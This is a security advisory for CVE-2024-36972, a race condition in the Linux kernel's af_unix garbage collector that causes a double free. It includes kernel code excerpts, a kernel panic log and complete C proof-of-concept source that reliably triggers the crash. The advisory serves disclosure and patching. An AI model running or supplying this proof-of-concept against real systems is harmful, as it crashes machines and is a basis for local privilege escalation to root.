(CVE-2024-36972) Linux Kernel Race Condition in unix_gc on oob_skb Leading to Double Free
CVE: CVE-2024-36972
Affected Versions: Linux kernel >= 6.8 (introduced by commit 1279f9d9, 3 Feb 2024)
CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
| Product | Linux Kernel |
|---|---|
| Vendor | Linux |
| Severity | High — local attackers may exploit this vulnerability to elevate privileges to root |
| Affected Versions | Linux kernel >= 6.8 (upstream), introduced by commit 1279f9d9 (3 Feb 2024) |
| CVE Identifier | CVE-2024-36972 |
| CVE Description | A use-after-free vulnerability in the Linux kernel unix socket can be exploited to achieve local privilege escalation |
| CWE Classification(s) | CWE-415: Double Free |
CVSS3.1 Scoring System
Base Score: 7.8 (High)
Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
| Metric | Value |
|---|---|
| Attack Vector (AV) | Local |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | Low |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |
Description of the vulnerability
The vulnerability was introduced by commit 1279f9d9 (af_unix: Call kfree_skb() for dead unix_(sk)->oob_skb in GC), which caused unix_gc to free oob_skb without holding unix_state_lock:
void unix_gc(void)
{
...
list_for_each_entry(u, &gc_candidates, link) {
scan_children(&u->sk, inc_inflight, &hitlist);
#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
if (u->oob_skb) {
kfree_skb(u->oob_skb);
u->oob_skb = NULL;
}
#endif
}
A peer unix socket can concurrently acquire the lock and modify oob_skb via queue_oob:
static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other,
struct scm_cookie *scm, bool fds_sent)
{
...
unix_state_lock(other);
if (sock_flag(other, SOCK_DEAD) ||
(other->sk_shutdown & RCV_SHUTDOWN)) {
unix_state_unlock(other);
kfree_skb(skb);
return -EPIPE;
}
maybe_add_creds(skb, sock, other);
skb_get(skb);
if (ousk->oob_skb)
consume_skb(ousk->oob_skb);
WRITE_ONCE(ousk->oob_skb, skb);
There is a race condition where both unix_gc and queue_oob refer to the same oob_skb, causing a double free and kernel panic. A local attacker with low privileges can exploit this to achieve local privilege escalation to root.
Proof of Concept
billy@VM:~$ uname -a
Linux VM 6.9.0-rc7 #1 SMP PREEMPT_DYNAMIC Mon May 6 09:32:43 CST 2024 x86_64 x86_64 x86_64 GNU/Linux
billy@VM:~$ ./a.out
[ 22.254056] BUG: kernel NULL pointer dereference, address: 0000000000000008
[ 22.255997] #PF: supervisor write access in kernel mode
[ 22.257517] #PF: error_code(0x0002) - not-present page
[ 22.258851] PGD 0 P4D 0
[ 22.259677] Oops: 0002 [#1] PREEMPT SMP PTI
[ 22.260776] CPU: 0 PID: 136 Comm: kworker/0:4 Not tainted 6.9.0-rc7 #1
[ 22.262280] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[ 22.264299] Workqueue: events delayed_fput
[ 22.265177] RIP: 0010:skb_dequeue+0x52/0x90
[ 22.266129] Code: 39 dc 74 3e 8b 43 10 48 89 ef 83 e8 01 89 43 10 49 8b 44 24 08 49 c7 44 24 08 00 00 00 00 49 8b 14 24 49 c7 04 24 00 00 00 00 <48> 89 42 08 48 89 10 e8 b2 51 47 00 4c 89 e0 5b 5d 41 5c c3c
[ 22.270059] RSP: 0018:ffffc900006afd50 EFLAGS: 00010002
[ 22.270961] RAX: 0000000000000000 RBX: ffff88810c4fd4a8 RCX: 0000000000000000
[ 22.272393] RDX: 0000000000000000 RSI: 0000000000000202 RDI: ffff88810c4fd4bc
[ 22.274157] RBP: ffff88810c4fd4bc R08: ffff88810c4fd97c R09: ffff88810b230080
[ 22.275606] R10: 0000000000000008 R11: 0000000000000000 R12: ffff88810182a700
[ 22.276852] R13: ffff88810c4fd800 R14: 0000000000000001 R15: ffff88810c4fd480
[ 22.278124] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 22.279580] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 22.280701] CR2: 0000000000000008 CR3: 0000000104e58000 CR4: 00000000000006f0
[ 22.282315] Call Trace:
[ 22.282990] <TASK>
[ 22.283544] ? __die_body+0x1f/0x70
[ 22.284292] ? page_fault_oops+0x15c/0x470
[ 22.285256] ? search_extable+0x26/0x30
[ 22.286379] ? search_bpf_extables+0x63/0x90
[ 22.287337] ? fixup_exception+0x26/0x330
[ 22.288325] ? exc_page_fault+0x81/0x170
[ 22.289299] ? asm_exc_page_fault+0x26/0x30
[ 22.290173] ? skb_dequeue+0x52/0x90
[ 22.290902] unix_release_sock+0x252/0x410
[ 22.291976] unix_release+0x32/0x50
[ 22.292721] __sock_release+0x3d/0xc0
[ 22.293465] sock_close+0x15/0x20
[ 22.294216] __fput+0x9d/0x2c0
[ 22.295047] delayed_fput+0x23/0x30
[ 22.296886] process_scheduled_works+0xd7/0x3f0
[ 22.297731] worker_thread+0x114/0x280
[ 22.298752] ? __pfx_worker_thread+0x10/0x10
[ 22.299500] kthread+0xe2/0x110
[ 22.300311] ? __pfx_kthread+0x10/0x10
[ 22.301890] ret_from_fork+0x34/0x50
[ 22.302670] ? __pfx_kthread+0x10/0x10
[ 22.303210] ret_from_fork_asm+0x1a/0x30
[ 22.303972] </TASK>
[ 22.304635] Modules linked in:
[ 22.305605] CR2: 0000000000000008
[ 22.306566] ---[ end trace 0000000000000000 ]---
[ 22.307599] RIP: 0010:skb_dequeue+0x52/0x90
[ 22.308566] Code: 39 dc 74 3e 8b 43 10 48 89 ef 83 e8 01 89 43 10 49 8b 44 24 08 49 c7 44 24 08 00 00 00 00 49 8b 14 24 49 c7 04 24 00 00 00 00 <48> 89 42 08 48 89 10 e8 b2 51 47 00 4c 89 e0 5b 5d 41 5c c3c
[ 22.310759] RSP: 0018:ffffc900006afd50 EFLAGS: 00010002
[ 22.311963] RAX: 0000000000000000 RBX: ffff88810c4fd4a8 RCX: 0000000000000000
[ 22.313668] RDX: 0000000000000000 RSI: 0000000000000202 RDI: ffff88810c4fd4bc
[ 22.315178] RBP: ffff88810c4fd4bc R08: ffff88810c4fd97c R09: ffff88810b230080
[ 22.316860] R10: 0000000000000008 R11: 0000000000000000 R12: ffff88810182a700
[ 22.318745] R13: ffff88810c4fd800 R14: 0000000000000001 R15: ffff88810c4fd480
[ 22.320376] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 22.321906] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 22.323009] CR2: 0000000000000008 CR3: 0000000104e58000 CR4: 00000000000006f0
[ 22.324557] Kernel panic - not syncing: Fatal exception
[ 22.326468] Kernel Offset: disabled
[ 22.327599] ---[ end Kernel panic - not syncing: Fatal exception ]---
Source Code
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <assert.h>
#include <string.h>
#include <stdlib.h>
#include <stddef.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <sys/time.h>
#include <err.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <pthread.h>
#include <sys/socket.h>
#define SYSCHK(x) \
({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
char buf[0x1000];
char send_buf[0x1000];
pthread_barrier_t barr;
static void barrier(void)
{
int ret = pthread_barrier_wait(&barr);
assert(!ret || ret == PTHREAD_BARRIER_SERIAL_THREAD);
}
int send_fd(int ufd, int fd)
{
struct msghdr msg = {};
struct iovec iov[] = {{.iov_base = buf, .iov_len = 1}};
msg.msg_iov = iov;
msg.msg_iovlen = 1;
struct cmsghdr *cmsg;
int len = CMSG_LEN(sizeof(int) * 1);
memset(send_buf, 0, 0x1000);
cmsg = (void *)send_buf;
cmsg->cmsg_len = len;
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
msg.msg_control = cmsg;
msg.msg_controllen = len;
*(int *)CMSG_DATA(cmsg) = fd;
SYSCHK(sendmsg(ufd, &msg, 0));
}
void *job(void *x)
{
while (1) {
barrier();
close(SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0)));
barrier();
}
}
int main(int argc, char **argv)
{
int cfd[2];
pthread_t tid;
pthread_barrier_init(&barr, NULL, 2);
signal(SIGPIPE, SIG_IGN);
pthread_create(&tid, 0, job, 0);
while (1) {
SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
SYSCHK(send(cfd[1], buf, 1, MSG_OOB));
send_fd(cfd[1], cfd[0]);
close(cfd[0]);
barrier();
send(cfd[1], buf, 1, MSG_OOB);
barrier();
close(cfd[1]);
}
}
Timeline
- 2024-02-03 — Vulnerability introduced upstream:
1279f9d9(af_unix: Call kfree_skb() for dead unix_(sk)->oob_skb in GC) - 2024-05-07 — Reported to Linux Kernel Security Team
- 2024-05-16 — Fix committed upstream:
9841991a(af_unix: Update unix_sk(sk)->oob_skb under sk_receive_queue lock) - 2024-06-21 — CVE-2024-36972 assigned and published